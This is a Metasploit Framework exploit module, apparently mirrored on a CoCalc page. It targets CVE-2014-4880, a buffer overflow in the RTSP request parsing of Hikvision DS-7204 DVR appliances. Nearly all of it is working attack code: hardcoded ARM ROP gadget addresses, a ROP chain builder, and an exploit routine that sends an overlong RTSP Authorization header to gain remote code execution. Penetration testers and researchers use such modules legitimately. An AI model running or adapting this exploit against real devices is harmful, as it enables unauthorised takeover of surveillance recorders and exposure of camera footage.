Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
19513 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
16
'Description' => %q{
17
This module exploits a buffer overflow in the RTSP request parsing
18
code of Hikvision DVR appliances. The Hikvision DVR devices record
19
video feeds of surveillance cameras and offer remote administration
20
and playback of recorded footage.
21
22
The vulnerability is present in several models / firmware versions
23
but due to the available test device this module only supports
24
the DS-7204 model.
25
},
26
'Author' => [
27
'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
28
],
29
'License' => MSF_LICENSE,
30
'References' => [
31
[ 'CVE', '2014-4880' ],
32
[ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
33
],
34
'Platform' => 'linux',
35
'Arch' => ARCH_ARMLE,
36
'Privileged' => true,
37
'Targets' => [
38
#
39
# ROP targets are difficult to represent in the hash, use callbacks instead
40
#
41
[
42
"DS-7204 Firmware V2.2.10 build 131009", {
43
44
# The callback handles all target-specific settings
45
:callback => :target_ds7204_1,
46
'g_adjustesp' => 0x002c828c,
47
# ADD SP, SP, #0x350
48
# LDMFD SP!, {R4-R6,PC}
49
50
'g_r3fromsp' => 0x00446f80,
51
# ADD R3, SP, #0x60+var_58
52
# BLX R6
53
54
'g_blxr3_pop' => 0x00456360,
55
# BLX R3
56
# LDMFD SP!, {R1-R7,PC}
57
58
'g_popr3' => 0x0000fe98,
59
# LDMFD SP!, {R3,PC}
60
}
61
],
62
63
[
64
"Debug Target", {
65
66
# The callback handles all target-specific settings
67
:callback => :target_debug
68
69
}
70
]
71
72
],
73
'DefaultTarget' => 0,
74
'DisclosureDate' => '2014-11-19',
75
'Notes' => {
76
'Reliability' => UNKNOWN_RELIABILITY,
77
'Stability' => UNKNOWN_STABILITY,
78
'SideEffects' => UNKNOWN_SIDE_EFFECTS
79
}
80
)
81
)
82
83
register_options(
84
[
85
Opt::RPORT(554)
86
]
87
)
88
end
89
90
def exploit
91
unless self.respond_to?(target[:callback], true)
92
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
93
end
94
95
device_rop = self.send(target[:callback])
96
97
request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
98
request << "CSeq: 7\r\n"
99
request << "Authorization: Basic "
100
request << rand_text_alpha(0x280 + 34)
101
request << [target["g_adjustesp"]].pack("V")[0..2]
102
request << "\r\n\r\n"
103
request << rand_text_alpha(19)
104
105
# now append the ropchain
106
request << device_rop
107
request << rand_text_alpha(8)
108
request << payload.encoded
109
110
connect
111
sock.put(request)
112
disconnect
113
end
114
115
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
116
def target_ds7204_1
117
# Create a fixed-size buffer for the rop chain
118
ropbuf = rand_text_alpha(24)
119
120
# CHAIN = [
121
# 0, #R4 pop adjustsp
122
# 0, #R5 pop adjustsp
123
# GADGET_BLXR3_POP, #R6 pop adjustsp
124
# GADGET_POPR3,
125
# 0, #R3 pop
126
# GADGET_R3FROMSP,
127
# ]
128
129
ropbuf[8, 4] = [target["g_blxr3_pop"]].pack("V")
130
ropbuf[12, 4] = [target["g_popr3"]].pack("V")
131
ropbuf[20, 4] = [target["g_r3fromsp"]].pack("V")
132
133
return ropbuf
134
end
135
136
# Generate a buffer that provides a starting point for exploit development
137
def target_debug
138
Rex::Text.pattern_create(2000)
139
end
140
141
def rhost
142
datastore['RHOST']
143
end
144
145
def rport
146
datastore['RPORT']
147
end
148
end
149
150